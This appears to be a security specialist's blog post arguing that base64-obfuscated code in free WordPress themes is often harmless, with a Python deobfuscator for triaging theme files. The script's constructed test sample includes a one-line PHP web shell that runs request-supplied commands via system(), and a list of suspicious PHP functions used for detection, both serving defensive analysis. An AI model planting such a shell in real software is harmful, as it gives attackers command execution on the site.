This might be a little on the controversial side, but as a security specialist, I believe that too often people are getting “hyped-up” over obfuscated code.
I recently read a blog post titled, “Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else” and while I commend the writer for researching this topic, I also felt compelled to write this rebuttal.
Too often people read that hackers use base64_decode in their infections, grep their sites for that string, and become alarmists when they find it.
“Oh no! How did this happen to my site?”
“What do I do now?”
People – it has many, many legitimate uses as well.
Not to discredit the author of the original research, but I did want to provide further details from a security specialist’s point of view.
I’ll dive into a few of the themes that were listed in the original post.
1. Downloading PRiNZ Branford Magazine theme from WordPressthemesbase.com resulted in a zip file that required a password. Further investigation uncovered this as a possible unauthorized copy of an older version of this theme. While this theme may be harmful to your website, we decided to drop our investigation of this one as you can’t open the downloaded copy from wordpressthemesbase.com anyway.
Result: BAD!!! If you want this theme, get it from http://www.der-prinz.com and pay the $40 – $45 and be done with it.
2. We downloaded the BeautyStore theme from http://www.freewordpressthemes.com and looked at the footer.php which was identified by the original poster as having “severe warnings”. Our deobfuscator showed us this in the footer.php:
Nothing malicious looking there. Appears to be typical footer type code.
Result: Safe. This is an example of flagging code as bad without fully decoding or deobfuscating it – once decoded, this isn’t.
3. We downloaded a number of themes from the site: www.themes2wp.com, however out of 4 downloads, they were all empty. Not sure what was going on there.
Going by the original poster’s research, you can remove the links and have a nice theme. You can’t assume that code using an eval statement is bad; it has plenty of legitimate uses. Decode it and read what it actually does before passing judgement.
4. I’ll agree with the original poster on the theme downloaded from FreeWPThemes – it should be updated to conform with the WordPress 3.0 standards.
Result: I’d look for other themes that have been updated.
5. Obviously getting free WordPress themes from WordPress.org is going to be your safest option of them all.
Result: Go ahead and do it.
6. The FUNDA theme from themes.rock-kitty.net was downloaded and analyzed next.
In the original poster’s review of this theme, a number of eval(base64_decode( strings were identified.
The first one we looked at was in the file: functions.php. It starts out:
This decoded to:
Again – safe.
Analyzing the other base64_decode strings in the functions.php file showed they were harmless as well. I will admit that there are links to various websites embedded in the base64-encoded strings, but they are harmless. If I were to make a suggestion to the people running the website we downloaded this theme from, it would be to stop using popular themes to build their backlinks.
The website: themes.rock-kitty.net is registered to: Artem Minaev. One of the links embedded in the base64_decode string is: bestincellphones.com, which is a private domain registration so we don’t know who it belongs to, but someone at themes.rock-kitty.net is getting something out of embedding links. We downloaded the FUNDA theme from www.newwpthemes.com and found it did not have any of the links or base64_decode in it so we can only conclude that it was embedded at Rock-kitty.
Result: While maybe sneaky, the theme downloaded from Rock-kitty is safe, although I would download it from newwpthemes.com instead.
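To show what “decode it and read it” looks like in practice for both the BeautyStore footer.php and the FUNDA functions.php cases above, here is an added example of the kind of deobfuscator we ran. It is not code from this post, from the themes, or from any of the theme sites; the two PHP samples in it are constructed for the demonstration (the footer markup, the example.com backlink and the request-driven system() snippet are placeholders, not taken from any theme named here). It peels eval(base64_decode(...)), eval(gzinflate(base64_decode(...))) and similar stacked wrappers layer by layer, then lists the URLs and the handful of constructs in the decoded code that actually warrant a second look.

```python
import base64
import codecs
import re
import zlib

# Python equivalents of the PHP wrapper functions commonly stacked around a
# string literal inside eval(). gzinflate() is raw DEFLATE (wbits=-15);
# gzuncompress() is zlib-framed data.
WRAPPERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": lambda b: zlib.decompress(b),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( <one or more wrapper calls> '<literal>' <closing parens> );
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])([^'\"]*)\2\s*\)+\s*;?",
    re.IGNORECASE,
)

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)

# Constructs in *decoded* theme code worth reading carefully: code execution
# primitives, request-controlled input, file writes and outbound fetches.
SUSPICIOUS = ("system(", "exec(", "shell_exec(", "passthru(", "popen(",
              "$_POST", "$_GET", "$_REQUEST", "$_COOKIE",
              "file_put_contents(", "fwrite(", "curl_exec(", "create_function(")


def _decode_match(m):
    """Apply the wrapper chain to the literal, innermost wrapper first."""
    chain = re.findall(r"\w+", m.group(1))          # outermost first
    data = m.group(3).encode("latin-1")
    for name in reversed(chain):
        fn = WRAPPERS.get(name.lower())
        if fn is None:
            raise ValueError(f"unknown wrapper {name}(); decode it by hand")
        data = fn(data)
    return data.decode("latin-1")


def unwrap(code, max_rounds=10):
    """Replace every eval(<wrappers>('literal')) in `code` with the PHP it
    decodes to, repeating until no wrapped eval is left (nested layers).
    Returns (decoded_code, layers_peeled)."""
    layers = 0
    for _ in range(max_rounds):
        new_code, n = EVAL_RE.subn(_decode_match, code)
        if n == 0:
            break
        code, layers = new_code, layers + 1
    return code, layers


def triage(php_source):
    """Decode the source and report what a reviewer should look at:
    how many layers were peeled, embedded URLs, and suspicious constructs.
    The verdict is left to the reader of the decoded code, not to the wrapper."""
    decoded, layers = unwrap(php_source)
    low = decoded.lower()
    return {
        "layers": layers,
        "decoded": decoded,
        "urls": sorted(set(URL_RE.findall(decoded))),
        "indicators": [s for s in SUSPICIOUS if s.lower() in low],
    }


# --- constructed samples (not from any real theme) -------------------------
def _wrap_b64(php):
    return "eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()


def _wrap_gz_b64(php):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw deflate, as gzdeflate()
    raw = c.compress(php.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()


# Harmless footer with a backlink, hidden under two layers (the footer.php shape).
FOOTER_PHP = "echo '<div id=\"footer\">Theme by <a href=\"http://example.com/\">Example</a></div>';"
SAMPLE_FOOTER = "<?php\n" + _wrap_b64(_wrap_gz_b64(FOOTER_PHP)) + "\n?>"

# Same wrapper, but the decoded payload is a request-driven command shell.
SAMPLE_BACKDOOR = "<?php\n" + _wrap_b64("if (isset($_REQUEST['c'])) { system($_REQUEST['c']); }") + "\n?>"

if __name__ == "__main__":
    for name, src in (("footer", SAMPLE_FOOTER), ("backdoor", SAMPLE_BACKDOOR)):
        r = triage(src)
        print(f"[{name}] layers={r['layers']} urls={r['urls']} indicators={r['indicators']}")
        print(r["decoded"])
```

Both samples start with the identical eval(base64_decode( wrapper; only the decoded text separates a backlink from a backdoor, which is the whole point. Run it over a theme directory by feeding each .php file’s contents to triage(), and treat an unknown wrapper (the ValueError) as a cue to decode that one by hand rather than to skip it.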
Closing: I’m not going to bore you with the details of the other themes. The point here is that you can’t just assume that since a theme, a widget or a plugin uses base64_decode, it’s bad or malicious. Treat a hit as a prompt to decode and read the code, not as a verdict.
I do give an “up-top”, as my wife would say, to the original poster for the research, but I would declare many of the themes safe.
If there’s a theme you want analyzed by us, send me an email or post a comment here with the website link and we’ll download it, analyze it and report on it. If this becomes a real popular topic, we’ll create a free analyzer and post it on our website.
Thank you for reading this far. Let’s be safe out there, but not make false accusations of harmless themes.